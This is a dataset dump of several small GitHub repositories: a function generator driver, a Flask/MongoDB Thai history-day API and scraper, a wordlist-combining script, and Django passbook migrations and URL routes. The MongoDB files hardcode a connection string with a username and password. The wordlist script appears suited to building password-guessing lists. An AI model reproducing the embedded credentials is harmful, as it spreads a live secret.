"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "\"\"\"Implements interface for Siglent SDG2000X function generators\"\"\"\n\nimport pyvisa\n\n\nclass SDGFunctionGenerator():\n \"\"\"Class with methods to controll Siglent SDG2000X function generators.\n\n Attributes\n ----------\n device: pyvisa.resources.TCPIPInstrument\n \"\"\"\n\n def __init__(self, ip):\n \"\"\"Establishes connection to device\n\n Parameters\n ----------\n ip : string\n ip address of the function generator\n \"\"\"\n rm = pyvisa.ResourceManager()\n self.device = rm.open_resource(\"TCPIP::{}\".format(ip))\n\n def query(self, scpi):\n \"\"\"Sends SCPI command to device and returns response.\n\n Parameters\n ----------\n scpi : string\n SCPI command\n \"\"\"\n return self.device.query(scpi)\n\n def idn(self):\n \"\"\"Gets device identification.\n \"\"\"\n return self.query(\"*IDN?\")\n"
},
{
"alpha_fraction": 0.5980629324913025,
"alphanum_fraction": 0.6283292770385742,
"avg_line_length": 24.030303955078125,
"blob_id": "c6ec2cc85c25221ce3133a5ded716dafba825385",
"content_id": "1b4906e6528ab0c13d33be1e90acb0c49dd11c5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 33,
"path": "/tests/test_sdg_function_generator.py",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom softlab.sdg_function_generator import SDGFunctionGenerator\n\n\nclass MockFunctionGenerator:\n def query(q):\n responses = {\"*IDN?\": (\"Siglent Technologies,SDG2122X,\"\n \"SDG2XCAQ2R1992,\"\n \"2.01.01.23R8\\n\")}\n return responses[q]\n\n\[email protected](scope=\"module\")\ndef fg(monkeysession, run_on_hardware):\n\n def mock_init(*args, **kwargs):\n pass\n\n ip = \"10.0.10.67\"\n\n if run_on_hardware:\n function_generator = SDGFunctionGenerator(ip)\n else:\n monkeysession.setattr(SDGFunctionGenerator, \"__init__\", mock_init)\n function_generator = SDGFunctionGenerator(ip)\n function_generator.device = MockFunctionGenerator\n\n return function_generator\n\n\ndef test_get_idn(fg):\n assert 'SDG' in fg.idn()\n"
},
{
"alpha_fraction": 0.7534246444702148,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 169.3333282470703,
"blob_id": "8e36586c65bee956aa5c2abfd9fcaad2f193c1da",
"content_id": "35976b6ae561ea050056c06fd6fb52c64daae0ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 498,
"num_lines": 3,
"path": "/README.md",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "## Softlab\n\n[](https://drone.dmeiburg.de/dm/softlab) [](https://codecov.io/gh/dmeiburg/softlab) [](https://github.com/pre-commit/pre-commit) [](https://opensource.org/licenses/MIT)\n"
},
{
"alpha_fraction": 0.6873614192008972,
"alphanum_fraction": 0.6873614192008972,
"avg_line_length": 22.736841201782227,
"blob_id": "f242dba06c58fb2818ae67c941d2427b0c410c81",
"content_id": "0cf6c07d2146da768b54a6c1cb941e1824b93dbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 19,
"path": "/tests/conftest.py",
"repo_name": "dmeiburg/softlab",
"src_encoding": "UTF-8",
"text": "import pytest\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--hw\", action=\"store_true\", default=False,\n help=\"run test agains real hardware\")\n\n\[email protected](scope=\"module\")\ndef run_on_hardware(request):\n return request.config.getoption(\"--hw\")\n\n\[email protected](scope=\"session\")\ndef monkeysession(request):\n from _pytest.monkeypatch import MonkeyPatch\n mpatch = MonkeyPatch()\n yield mpatch\n mpatch.undo()\n"
}
] | 4 |
feifengcai/david-heroku-1
|
https://github.com/feifengcai/david-heroku-1
|
85eb7879ff54a8b4448c4d8864ea22bae95d786f
|
c35bc22cd7387c6547fdb6c99f6ae1d24080e73e
|
135c3a0a964e6a30491de35a9ededaf06dd578a6
|
refs/heads/master
| 2020-04-05T06:56:43.427002 | 2018-11-14T00:51:11 | 2018-11-14T00:51:11 | 156,657,729 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5425853729248047,
"alphanum_fraction": 0.5520968437194824,
"avg_line_length": 30.630136489868164,
"blob_id": "da013e9c3d0e5c075759b032fc193dd42e635cd4",
"content_id": "051d73f01a5bd85d05cec6077cc5e3b43ed1d53c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2313,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 73,
"path": "/resources/item.py",
"repo_name": "feifengcai/david-heroku-1",
"src_encoding": "UTF-8",
"text": "import sqlite3\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.item import ItemModel\n\n\nclass Item(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('price', type=float, required=True, help=\"field is required\")\n parser.add_argument('store_id', type=int, required=True, help=\"Every item needs a store id.\")\n\n @jwt_required()\n def get(self, name):\n item = ItemModel.find_by_name(name)\n if item:\n return item.json()\n return {'message': 'Item not found'}, 404\n\n def post(self, name):\n if ItemModel.find_by_name(name):\n return {'message': \"An item with name '{}' already exists.\".format(name)}, 400\n\n data = Item.parser.parse_args()\n #item = ItemModel(name, data['price'], data['store_id'])\n item = ItemModel(name, **data)\t\t\n print(item)\n try:\n item.save_to_db()\n except:\n return {\"message\": \"An error in inserting item.\"}, 500 # internal server error\n\n return item.json(), 201\n\n @jwt_required()\n def delete(self, name):\n item = ItemModel.find_by_name(name)\n if item:\n item.delete_from_db()\n return {'message': \"item '{}' is deleted.\".format(name)}, 200\n\n @jwt_required()\n def put(self, name):\n data = Item.parser.parse_args()\n item = ItemModel.find_by_name(name)\n status = 200\n if item and item.price == data['price']:\n return {'message': \"Nothing to update.\"}, status\n\n if item is None:\n item = ItemModel(name, data['price'], data['store_id'])\n status = 201\n else:\n item.price = data['price']\n item.save_to_db()\n return item.json(), status\n\n\nclass ItemList(Resource):\n def get(self):\n #return {'items': list(map(lambda x:x.json(), ItemModel.query.all()))}\n return {'items': [x.json() for x in ItemModel.query.all()]}\n '''\n def get(self):\n items = ItemModel.query.all()\n print (\"----\", type(items), items)\n r = []\n for x in items:\n print(\"----\", type(x), x, x.json())\n print(\"----\", x.name, x.price)\n r.append(x.json())\n print (\"----\", r)\n return {'items': r}\n '''\n\n\n\n\n"
}
] | 1 |
scrape-python-supasun/api-heroku-pymongo
|
https://github.com/scrape-python-supasun/api-heroku-pymongo
|
a98ba13e418ab21954081749d36c4efecedc2677
|
69e7299662d42239fbef13e440263ca9b900c642
|
9a028eab0630daabe7f43bf4ab85a00560987e2a
|
refs/heads/master
| 2022-10-23T22:25:17.940507 | 2018-11-13T16:14:36 | 2018-11-13T16:14:36 | 157,397,116 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4790697693824768,
"alphanum_fraction": 0.6930232644081116,
"avg_line_length": 15.538461685180664,
"blob_id": "bcbd5e4a483e14cb97e52baf6cdd46d73d8056f5",
"content_id": "96050c77f43bead34b4a265fe2e1c4b01cac15d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 26,
"path": "/requirements.txt",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "absl-py==0.6.1\naniso8601==4.0.1\nastor==0.7.1\nClick==7.0\nFlask==1.0.2\nFlask-PyMongo==2.2.0\nFlask-RESTful==0.3.6\ngast==0.2.0\ngrpcio==1.16.0\ngunicorn==19.9.0\nh5py==2.8.0\nitsdangerous==1.1.0\nJinja2==2.10\nKeras-Applications==1.0.6\nKeras-Preprocessing==1.0.5\nMarkdown==3.0.1\nMarkupSafe==1.1.0\nnumpy==1.15.4\nprotobuf==3.6.1\npymongo==3.7.2\npytz==2018.7\nsix==1.11.0\ntensorboard==1.12.0\ntensorflow==1.12.0\ntermcolor==1.1.0\nWerkzeug==0.14.1\n"
},
{
"alpha_fraction": 0.6937573552131653,
"alphanum_fraction": 0.7320376634597778,
"avg_line_length": 61.85185241699219,
"blob_id": "ce55b7f9054dc16aadf597e9ad3c6cc6e30683f2",
"content_id": "fbaa739359d1e621743d6284ae242cfa5c381e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 54,
"path": "/README.md",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "\"# api-heroku-pymongo\" \nสิ่งที่รู้เท่าที่จำได้\n1.เครื่อมือที่ใช้มี virtualenv โดยใช้Scripts\\activateตลอดเวลา เเล้วใช้pip freezeเพื่อดูว่าเรามีอะไรบ้างอย่างในที่นี้ต้องโหลด\npip install flask_restful, pip install flask, pip install flask_pymongo, pip install gunicorn โดยทั้ง4เอามาจากfromของไฟล์addapihistoryday.pyต้องทำหลังคำสั่งScripts\\activate\nจากนั้นใช้คำสั้ง pip freeze ว่ามี4อันที่เราต้องการไหม จากนั้นใช้คำสั่ง pip freeze > requirements.txt\nhttps://medium.com/@nonthakon/virtualenv-%E0%B9%83%E0%B8%99-python-3-windows-10d3dd89a0a7\n2.gunicorn คือไฟล์ที่เอาไฟล์เราเชื่อมต่อapi เช่นในไฟล์gunicornเรา คำสั่งweb: gunicorn addapihistoryday:app ให้เปลี่ยนเเค่ addapihistorydayตามซื่อไฟล์ที่เราจะเชื่อมกับapi\n3.ไฟล์นี้ถ้าลงapiในherokuจะได้https://historyday.herokuapp.com/calendar?date=1208 เเต่ถ้าใช้คำสั่งpython ตามด้วยซื่อไฟล์apiของเรา.pyก็จะได้127.0.0.1/calendar?date=1208 โดยเปนการให้ข้อมูลเกี่ยวกับวันสำคัญ2ตัวเเรกคือวัน2ตัวหลังคือเดือนถ้าไม่เจอวันนั้นคือไม่มีวันสำคัญ\n4.ใช้ heroku logs --tailในการรัน heroku api\n5.ถ้าจะรัน flask จะต้องใช้set FLASK_APP=hello.py โดยhello.pyคือซื่อไฟล์ของเราจากนั้นพิมคำสั่งflask run\n6.beautiful soup # a = soup.find_all(\"a\", attrs={\"class\": \"sister\"}) คือ <a class\"sister\"></a>\nโดยต้องimport\nimport urllib\nfrom bs4 import BeautifulSoup\nimport re\nเเละใช้คำสั่ง\nr = urllib.request.urlopen('http://www.tewfree.com/%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B9%84%E0%B8%97%E0%B8%A2/').read() <===คือเว็บที่เราจะดึงข้อมูล\nsoup = BeautifulSoup(r ,'html.parser')\nprint(soup)เพื่อที่จะดูข้อมูลในเว็บ\n7.เราจะใช้pymongoเราต้องเข้าไปที่resourcesของmlabจากนั้น add mlabเเล้วกดไปที่setting กดที่reveal config vars จากนั้นก็อปไปไฟล์ที่เราจะเชื่อมกับpymongoก็คือhistoryday.pyโดยพิมคำสั่งเข้าไปเช่น\nimport pymongo\nfrom pymongo import MongoClient\nuri = \"mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1\" <==ดูจากsetting กดที่reveal config vars\nclient = MongoClient(uri)\ndb = client[\"heroku_x8cpgsr1\"]\ncollections = db['historyday'] <==ถานข้อมูลซื่อ\nเเล้วใช้function คือ databaseHistoryDay() ในไฟล์history.day\n8.โดยฟังชั่นHeaderDayHistory()คือหัวข้อ, contentDayHistory()คือเนื้อหา, numberOfDetail()ลำดับid,allDataHistoryDay() คือรวมทั้ง3ฟังชั่น ,ฟั่งชั้นdatabaseHistoryDay()คือดึงเข้าpymongoโดยสามารถดูได้ทางmlab\n=======================================================\nไฟล์addapihistoryday\n1.app.config['MONGO_URI'] = 'mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1'<==ดูจากsetting กดที่reveal config \n2.ฟังชั่นdateเเปลงurlเปน4ตัวเช่นhttps://historyday.herokuapp.com/calendar?date=1208 1208คือตัวที่เราจะเเสดง\nโดยมีฟังชั้น\nparser = reqparse.RequestParser()\nparser.add_argument('date', type=str)<===คือuriเว็บตัวdate==\n3.ในฟังชั่น calendarDay คือเชื่อมapi heroku\nโดยใช้\nargs = parser.parse_args()\ncalendar = args['date'] # เอาค่าฟังชั่นเก็บในcalendar\n4.\ntry:\n query = {\"contentData\": date(calendar)} <==เอาฟังชั่นมาใช้\n projection = {'_id':False}<==ไม่เอา_idเพราะไม่จำเป็น\n historyData = mongo.db.historyday.find(query, projection)รวมทั้งสอง\n return jsonify(historyData[0])<==ต้องทำให้มันออกมาจากlist\nexcept:\n return 'Not found'<==หาไม่เจอurlให้ปริ้นอันนี้\n \n5.api.add_resource(calendarDay, '/calendar')<==คือตัวcalendar https://historyday.herokuapp.com/calendar?date=1208\n6.พิม\nif __name__ == '__main__':\n app.run(debug=True)\n \n****อย่าลืม กด deployในherokuเเล้วpushเหมือนgithub\n\n\n"
},
{
"alpha_fraction": 0.6809148788452148,
"alphanum_fraction": 0.7094113230705261,
"avg_line_length": 31.08433723449707,
"blob_id": "cc389f6ff303d3a8314a563004f23667d2a0b859",
"content_id": "13137ed0c73459627edcdecf21d30848b7710699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2717,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 83,
"path": "/historyday.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "# languague : beautihulsoup\nimport urllib\nfrom bs4 import BeautifulSoup\nimport re\n# languague : beautihulsoup\n\n# languague : pymongo\nimport pymongo\nfrom pymongo import MongoClient\nuri = \"mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1\"\nclient = MongoClient(uri)\ndb = client[\"heroku_x8cpgsr1\"]\ncollections = db['historyday']\n# languague : pymongo\n# languague : beautihulsoup\nr = urllib.request.urlopen('http://www.tewfree.com/%E0%B8%A7%E0%B8%B1%E0%B8%99%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B9%84%E0%B8%97%E0%B8%A2/').read()\nsoup = BeautifulSoup(r ,'html.parser')\n# \n# print(soup)\n\n# a = soup.find_all(\"a\", text=\"วันที\")\n# a = soup.find_all(\"a\", attrs={\"class\": \"sister\"})\n# header = soup.html.find_all(\"strong\")\n# content = soup.find_all(\"div\", attrs={\"class\": \"entry-content-inner medium-10 columns small-12 content-inner-between\"})\n\n# languague : beautihulsoup\n# languague : python\ndef HeaderDayHistory():\n allDataHistoryDay = soup.find_all(\"p\")\n AllListHeader = []\n # print(contentday)\n for element in allDataHistoryDay[4:82]:\n allDataText = element.text\n myListOneData = allDataText.split(\"–\")\n AllHeaderData = myListOneData[1]\n AllListHeader.append(AllHeaderData)\n return AllListHeader\n# HeaderDetail = HeaderDayHistory()\n# print(HeaderDetail)\n\ndef contentDayHistory():\n allDataHistoryDay = soup.find_all(\"p\")\n ListAllContentData = []\n for element in allDataHistoryDay[4:82]:\n allDataText = element.text\n myListOneData = allDataText.split(\"–\")\n AllContentData = myListOneData[0]\n ListAllContentData.append(AllContentData)\n return ListAllContentData\n# contentDetail = contentDayHistory()\n# print(contentDetail)\n\ndef numberOfDetail():\n numberDataList = []\n for element in range(1,79):\n numberOneList = element\n numberDataList.append(numberOneList)\n return numberDataList\n# numberOfData = numberOfDetail()\n\n\ndef allDataHistoryDay():\n HeaderDetail = HeaderDayHistory()\n contentDetail = contentDayHistory()\n numberOfData = numberOfDetail()\n listDataAll = []\n for element in range(0,78):\n mydict = {\"id\":numberOfData[element],\"historyData\":HeaderDetail[element],\"contentData\":contentDetail[element]}\n listDataAll.append(mydict)\n return listDataAll\n\n# allDataDay = allDataHistoryDay()\n# print(allDataDay)\n# languague : python\n# languague : pymongo\ndef databaseHistoryDay():\n allDataDay = allDataHistoryDay()\n result = collections.insert_many(allDataDay)\n result.inserted_ids\n return result\ndatabaseHistoryDay() \n# // ลบคอมเม้นเอาไว้ต่อmlab heroku\n# languague : pymongo\n\n\n\n\n"
},
{
"alpha_fraction": 0.39517056941986084,
"alphanum_fraction": 0.47566115856170654,
"avg_line_length": 21.110170364379883,
"blob_id": "7c6949f34f09d98e46b5706dc6f1ff627ed24682",
"content_id": "86abaa5cc7be2e1d94706556be9c5fb2c8f1d1d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2835,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 118,
"path": "/addapihistoryday.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "from flask_restful import Resource, Api, reqparse\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_pymongo import PyMongo\nimport json\n\nfrom bson.json_util import dumps\n\n\n# วิธีรัน \n# 1.set FLASK_APP=addapihistoryday.py\n# 2.flask run\n\napp = Flask(__name__)\napp.config['MONGO_URI'] = 'mongodb://heroku_x8cpgsr1:[email protected]:61183/heroku_x8cpgsr1'\nmongo = PyMongo(app)\napi = Api(app)\n\n# user = mongo.db.historyday.find_one_or_404({\"historyData\":HeaderDetail[element]})\n\nparser = reqparse.RequestParser()\nparser.add_argument('date', type=str)\n# dictp = parser.parse_args()\ndef date(date):\n day = date[:2]\n month = date[2:]\n mouthList = {\n \"01\": \"มกราคม\",\n \"02\": \"กุมภาพันธ์\",\n \"03\": \"มีนาคม\",\n \"04\": \"เมษายน\",\n \"05\": \"พฤษภาคม\",\n \"06\": \"มิถุนายน\",\n \"07\": \"กรกฎาคม\",\n \"08\": \"สิงหาคม\",\n \"09\": \"กันยายน\",\n \"10\": \"ตุลาคม\",\n \"11\": \"พฤศจิกายน\",\n \"12\": \"ธันวาคม\"\n }\n dayList = {\n \"01\":\"1\",\n \"02\":\"2\",\n \"03\":\"3\",\n \"04\":\"4\",\n \"05\":\"5\",\n \"06\":\"6\",\n \"07\":\"7\",\n \"08\":\"8\",\n \"09\":\"9\",\n \"10\":\"10\",\n \"11\":\"11\",\n \"12\":\"12\",\n \"13\":\"13\",\n \"14\":\"14\",\n \"15\":\"15\",\n \"16\":\"16\",\n \"17\":\"17\",\n \"18\":\"18\",\n \"19\":\"19\",\n \"10\":\"10\",\n \"11\":\"11\",\n \"12\":\"12\",\n \"13\":\"13\",\n \"14\":\"14\",\n \"15\":\"15\",\n \"16\":\"16\",\n \"17\":\"17\",\n \"18\":\"18\",\n \"19\":\"19\",\n \"20\":\"20\",\n \"21\":\"21\",\n \"22\":\"22\",\n \"23\":\"23\",\n \"24\":\"24\",\n \"25\":\"25\",\n \"26\":\"26\",\n \"27\":\"27\",\n \"28\":\"28\",\n \"29\":\"29\",\n \"30\":\"30\",\n \"31\":\"31\",\n }\n if day in dayList and month in mouthList:\n return dayList[day] + ' ' + mouthList[month] + ' '\n\n\n\nclass calendarDay(Resource):\n def get(self):\n # calendar = date(date)\n args = parser.parse_args()\n calendar = args['date']\n # เอาค่ามาเก็บในcalendar\n # return \"Input is {}\".format(date(calendar))\n try:\n query = {\"contentData\": date(calendar)}\n projection = {'_id':False}\n historyData = mongo.db.historyday.find(query, projection)\n return jsonify(historyData[0])\n except:\n return 'Not found'\n\n\napi.add_resource(calendarDay, '/calendar')\n\n# api.add_resource('/')\n# api.add_resource(heyyou, '/heyyou',endpoint='heyyou')\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# วิธีดู\n# \n# http://127.0.0.1:5000/calendar?date=1208\n\n# pip freeze > requirements.txt\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5795454382896423,
"avg_line_length": 16.799999237060547,
"blob_id": "37fc42c1346cad4cf2eb30164eb0c92fd7ab17a6",
"content_id": "308d03f8e09c3058a1addac7f903086be3a41877",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/test.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "def number(x,y,z):\n sum = x + y + z\n return sum\nscore = number(1,2,3)\nprint(score)"
},
{
"alpha_fraction": 0.5334789156913757,
"alphanum_fraction": 0.5640465617179871,
"avg_line_length": 23.105262756347656,
"blob_id": "e08bf359e0fdffb26f886f8a7b8bdbac0f6f3103",
"content_id": "3258b4e5d7bbabb8fe842e01ac80ca47815f844d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1382,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 57,
"path": "/test2.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "from flask_restful import Resource, Api, reqparse\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_pymongo import PyMongo\nimport json\n\nfrom bson.json_util import dumps\n\napp = Flask(__name__)\n\napi = Api(app)\n\nparser = reqparse.RequestParser()\n# parser.add_argument('param1', type=str)\n# parser.add_argument('param2', type=str)\n# parser.add_argument('param3', type=str)\n\n# parser.add_argument('x', type=str)\n# parser.add_argument('y', type=str)\n\n\nparser.add_argument('num', type=str)\n\n\nclass testfun(Resource):\n def get(self):\n # เก็บparameter\n path = parser.parse_args()\n # x = int(path[\"x\"])\n # y = int(path[\"y\"])\n \n\n number = path[\"num\"]\n listThree = number.split(\",\")\n\n dict = {\n \"param1\": listThree[0],\n \"param2\": listThree[1],\n \"param3\": listThree[2]\n }\n sum = 0\n for element in listThree:\n sum += int(element)\n \n try:\n return sum\n # return path[\"param1\"] + path[\"param2\"] + path[\"param3\"]\n # http://127.0.0.1:5000/test?param1=param1¶m2=param2¶m3=param3\n # return 2 ** (x+y)\n #http://127.0.0.1:5000/test?x=3&y=2\n except:\n return 'Not found'\n\n\napi.add_resource(testfun, '/test')\n\nif __name__ == '__main__':\n app.run(debug=True)\n"
}
] | 6 |
laggiii/WordListMasher
|
https://github.com/laggiii/WordListMasher
|
d1e56f804abe4ba853211e88a5283bdab9dc8cfe
|
ef243d7291ec4d45147a1e253f0951f642af566c
|
2c302cdd0487b275025107397bb47698d3a766cf
|
refs/heads/master
| 2021-05-30T11:14:23.004631 | 2015-10-04T20:14:54 | 2015-10-04T20:14:54 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6850725412368774,
"alphanum_fraction": 0.7047262787818909,
"avg_line_length": 29.98550796508789,
"blob_id": "1618855115e0c87c73d803c8069ac226040b6914",
"content_id": "d37bbbb365bcf755dfdeb0cd603c897b47148ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 69,
"path": "/wlm.py",
"repo_name": "laggiii/WordListMasher",
"src_encoding": "UTF-8",
"text": "import sys, argparse, os\n\n# Configure Application Arguments\nparser = argparse.ArgumentParser(description='Combines wordlists to form more complex ones')\nparser.add_argument(\"wordlist1\", help=\"First wordlist input path\")\nparser.add_argument(\"wordlist2\", help=\"Second wordlist input path\")\nparser.add_argument(\"destination\", help=\"Output file destination\")\nparser.add_argument(\"-n\", \"--number\", help=\"Set upper maximum of number generation range\", type=int)\nargs = parser.parse_args()\n\n# Set Variables\nword1 = args.wordlist1\nword2 = args.wordlist2 \ndest = args.destination\n\n# Perform File Actions\nwordList1 = open(word1, 'r')\nwordList2 = open(word2, 'r')\nwordListMerge = open(\"tmp\", 'w')\nwordListMerge.close()\nwordListMerge = open(\"tmp\", 'a')\nwordListFinal = open(dest, 'w')\nwordListFinal.close()\nwordListFinal = open(dest, 'a')\n\nprint (\"[INFO] Input: \" + word1)\nprint (\"[INFO] Input: \" + word2)\nprint (\"[INFO] Output: \" + dest)\nprint (\"[INFO] Num Range: 0-\" + str(args.number))\n\nprint (\"[INFO] Starting List1 + List2 Merge\")\nfor line in wordList1:\n\tline = line.rstrip()\n\tfor line2 in wordList2:\n\t\tline2 = line2.rstrip() \n\t\twordListMerge.write(line + line2 + \"\\n\")\n\t\twordList2 = open(\"wordList2\")\n\twordList1 = open(\"wordList1\")\nprint(\"[INFO] Completed L1 + L2 Merge\")\n\nprint(\"[INFO] Starting List2 + List1 Merge\")\nfor line in wordList2:\n\tline = line.rstrip()\n\tfor line2 in wordList1:\n\t\tline2 = line2.rstrip() \n\t\twordListMerge.write(line + line2 + \"\\n\")\n\t\twordList1 = open(\"wordList1\")\n\twordList2 = open(\"wordList2\")\nprint(\"[INFO] Completed L2 + L1 Merge\")\n\nif args.number:\n\tprint(\"[INFO] Starting Number Addition\")\n\twordListMerge = open(\"tmp\", 'r')\n\tfor line in wordListMerge:\n\t\tline = line.rstrip()\n\t\tfor number in range(0, args.number):\n\t\t\twordListFinal.write(line + str(number) + \"\\n\")\n\t\twordListMerge = open(\"tmp\", 'r')\n\tprint(\"[INFO] Finished number addition\")\n\twordListMerge.close()\n\tos.remove(\"tmp\")\nelse:\n\twordListMerge = open(\"tmp\", 'r')\n\tfor line in wordListMerge:\n\t\tline = line.rstrip()\n\t\twordListFinal.write(line)\n\twordListMerge.close()\n\tos.remove(\"tmp\")\nprint(\"[INFO] Completed Merge: View \" + dest + \" for complete wordlist\")"
},
{
"alpha_fraction": 0.7615894079208374,
"alphanum_fraction": 0.7748344540596008,
"avg_line_length": 24.16666603088379,
"blob_id": "1d7bf415183ec29d3c3c3ef4826d269d28f265af",
"content_id": "425476d06bb2c1a66f2871875dd5370cd19c95b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/README.md",
"repo_name": "laggiii/WordListMasher",
"src_encoding": "UTF-8",
"text": "# WordListMasher\nPython WordList Combiner\n\n# Usage\n`wlm.py input1 input2 destination [-n int]`\n-n ; maximum number in range to generate after mutation\n"
}
] | 2 |
mr-love/django-passbook
|
https://github.com/mr-love/django-passbook
|
983cf33f66b7599149e4004eeeb7c2b02379eb2d
|
1c8907770f5e16dff80a53adc9bdc213b10cb1fa
|
41ef9b9c343d2eb5e6426b1fd24f16dac619aa83
|
refs/heads/master
| 2022-05-06T06:02:11.884134 | 2022-04-06T17:11:05 | 2022-04-06T17:18:33 | 99,647,455 | 0 | 2 |
MIT
| 2017-08-08T03:48:17 | 2021-10-11T00:21:08 | 2021-11-15T20:37:13 |
Python
|
[
{
"alpha_fraction": 0.5343642830848694,
"alphanum_fraction": 0.5773195624351501,
"avg_line_length": 23.25,
"blob_id": "75d14a4279218dce7a42625249e0593fafe251c2",
"content_id": "34824eaea2e8cff675e90f4a7de98a67611472e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 24,
"path": "/django_passbook/migrations/0002_push_token.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.14 on 2018-07-16 02:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('django_passbook', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='pass',\n options={'verbose_name': 'passes'},\n ),\n migrations.AlterField(\n model_name='registration',\n name='push_token',\n field=models.CharField(max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5930232405662537,
"alphanum_fraction": 0.6002907156944275,
"avg_line_length": 42,
"blob_id": "d3267aa47a41835857e6990adc94cf6b3c29df78",
"content_id": "0e8c0b855bf7f8b6ec6e2fbb32e38477d313c164",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 16,
"path": "/django_passbook/urls.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path\nfrom django_passbook.views import register_pass, latest_version, registrations, log\n\nurlpatterns = [\n re_path(\n r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$',\n register_pass\n ),\n re_path(\n r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$',\n register_pass\n ),\n re_path(r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)$', registrations),\n re_path(r'^v1/passes/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$', latest_version),\n re_path(r'^v1/log$', log),\n]\n"
},
{
"alpha_fraction": 0.5431472063064575,
"alphanum_fraction": 0.5600676536560059,
"avg_line_length": 35.9375,
"blob_id": "1ee57a284831d851f72c5e6ecf46cedab2b9ec58",
"content_id": "cc3c865fe49e40c3b2ef91d31471155779224734",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 48,
"path": "/django_passbook/migrations/0001_initial.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
